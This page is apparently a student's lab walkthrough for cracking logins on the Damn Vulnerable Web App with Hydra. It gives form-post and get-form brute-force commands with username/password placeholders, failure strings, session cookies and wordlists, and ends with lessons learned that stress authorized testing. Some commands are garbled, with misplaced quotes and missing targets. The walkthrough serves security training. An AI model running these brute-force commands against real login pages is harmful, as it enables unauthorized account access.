top of page

Damn Vulnerable Web APP Password Cracking with HYDRA


In the realm of cybersecurity, understanding vulnerabilities is crucial for fortifying digital systems against potential threats. One such avenue is password security, where inadequate measures can lead to unauthorized access. The Damn Vulnerable Web App (DVWA) serves as a practical platform for exploring these vulnerabilities in a controlled environment. In this project, we delve into password cracking using Hydra, a powerful tool bundled with Kali Linux.

This is a paragraph where you can add any information you want to share with website visitors. Click here to edit the text, change the font and make it your own.

Part 1

  1. Hydra is an application that was in Kali pre-installation. Type hydra in the CLI it will display the help section


2. The syntax becomes harder with different websites. Type Hydra
We will send post request :hydra http-form-post "/dvwa/login.php "


3. Next we have to find name for user name for the second argument. The username field is username hydra http-form-post "/dvwa/login.php :username=^USER^" We user hydra syntax for user for hydra to put any username in that field.


4.The name for the password field so we use command hydra http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^"  passwords in our list will get passed where pass is going .

5.We also need to simulate login button hydra http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^&Login=submit:Login Failed"


6. Also we need to differentiate incorrect and user password we put that at the end in order for the string to hydra http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^&Login=submit:Login Failed -L username.txt -P password.txt
7.    -L is the list
8.    -P for password list
9.    Nano username.txt
10.    Nano password.txt
11.   run command  hydra http-form-post "/dvwa/login.php :username=^USER^&password=^PASS^&Login=submit:Login Failed -L username.txt -P password.txt

Part 2

1.We are going to use Hydra to attack the brute force section of the dvwa website.


The user names and passwords are being sent with a ping using a get method. We have to use  http-get-form


2. Hydra http-get-form ""

3.  We have to specifiy path to page


4. Hydra http-get-form "dvwa/vulnerabilities/brute/:"


5. Separate the the form part where we need to specify usernaem and password. We must also look at the source file.



6.  run Hydra http-get-form "dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."-L username.txt -P password.txt


7 .Sometimes the command will not work we will need more arguments


8. Run this command :Hydra http-get-form

"dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H-Cookie: security=low; PHPSESSID=52e83e1ae2ad5e7aa2a10a93cb3c9676" -L username.txt -P password.txt

9.The command above syntax no longer works and has to be modified : hydra http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=low; PHPSESSID=2e65d4564c782005bb15e684783e3c99:Username and/or password incorrect." -L usernames.txt -P passwords.txt




10.  hydra [TARGET_ADDR] http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=low; PHPSESSID=SESSION_ID:Username and/or password incorrect." -L usernames.txt -P passwords.txt


11. We then see that only one password worked.

 Lessons Learned

  1. Hydra Utility: Hydra, an integral part of the Kali Linux distribution, is a versatile tool for performing password attacks. Its capabilities extend to various protocols and authentication mechanisms, making it a valuable asset in penetration testing.

  2. Help Section Exploration: Before diving into action, it's essential to familiarize oneself with the tool's functionalities. Typing 'hydra' reveals a comprehensive help section, providing insights into the available options and syntax.

  3. Understanding Syntax: The syntax for Hydra commands can vary depending on the target website's structure. This necessitates careful examination and adaptation of the command parameters to suit the specific scenario.

  4. HTTP Form-Post Attack: Cracking passwords through HTTP form-post requests involves crafting Hydra commands tailored to mimic user login attempts. Key elements include specifying the target IP, login page, username, password, and the login button submission.

  5. Differentiating Responses: Distinguishing between successful and failed login attempts is crucial. Hydra facilitates this by allowing users to define strings indicative of login success or failure, enabling efficient password enumeration.

  6. List Specification: Hydra enables the use of external lists for usernames and passwords, enhancing the scalability and effectiveness of brute-force attacks. Proper management of these lists is essential for maximizing success rates.

  7. HTTP Get-Form Attack: In scenarios where login credentials are transmitted via HTTP GET requests, Hydra's http-get-form module becomes instrumental. Similar principles apply, but adjustments are made to accommodate the distinctive request format.

  8. Handling Additional Parameters: Some scenarios may require additional parameters to ensure successful authentication. Understanding how to incorporate these parameters into Hydra commands is essential for overcoming such challenges.

  9. Source File Examination: Analyzing the source code of web pages can provide valuable insights into the structure of HTTP requests, aiding in the formulation of effective Hydra commands.

  10. Security Considerations: Adhering to ethical standards and legal obligations is paramount when conducting security assessments. Usage of tools like Hydra should be confined to authorized testing environments to prevent misuse and potential legal repercussions.

bottom of page